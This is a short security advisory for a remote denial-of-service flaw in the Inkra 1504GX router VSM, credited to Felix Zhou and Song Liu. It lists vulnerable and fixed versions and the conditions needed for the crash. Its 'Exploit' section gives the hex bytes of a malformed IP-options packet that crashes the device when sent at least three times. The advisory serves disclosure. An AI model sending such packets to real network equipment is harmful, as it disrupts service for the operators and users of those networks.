|
|
| |
The Inkra 1500 Series Virtual Service Switch "takes your security strategy to the next level, dynamically protecting your network and applications from internal attacks and security holes".
The Inkra 1504GX's router VSM does not properly parse the IP options, this allows a remote attacker to cause the product to crash by sending it malformed IP options. |
| |
Credit:
The information has been provided by Felix Zhou and Song Liu.
|
| |
Vulnerable Systems:
* Inkra Networks 1504GX Router Virtual Service Switch VSM 2.1.4.b003
Immune Systems:
* Inkra Networks 1504GX Router Virtual Service Switch VSM 2.1.5
* Inkra Networks 1504GX Router Virtual Service Switch VSM 2.0.9
Testing scenario:
The exportability of this vulnerability is only feasible if the following is true:
1. The Router VSM is selected as active VR
2. Between the Router VSM and the VP, no other VSMs exist
3. The VP is directly connected to the IO slot
Exploit:
You can recreate the issue by sending at least 3 times the following sample packet:
xx xx xx xx xx xx (DMAC)
xx xx xx xx xx xx (SMAC)
08 00
4e cc 00 58 15 24 00 00 56 01 xx xx (ip-csum)
xx xx xx xx (SIP)
xx xx xx xx (DIP)
eb 21 ad a6 eb e1 35 9b ce dd
a7 11 ea 5d c5 96 af 47 c1 50
f1 d1 5c 4b 18 9a c1 8a 13 6b
48 5e 74 83 c6 06
aa 9a 5e c2 a6 75 38 44 f8 43
d7 3f ae a1 e0 c6 e3 7c 4b 59
7a 95 1e 70 cc 04 1b 2a d1 6e
38 83
|
|
|
|
|
|
|
|
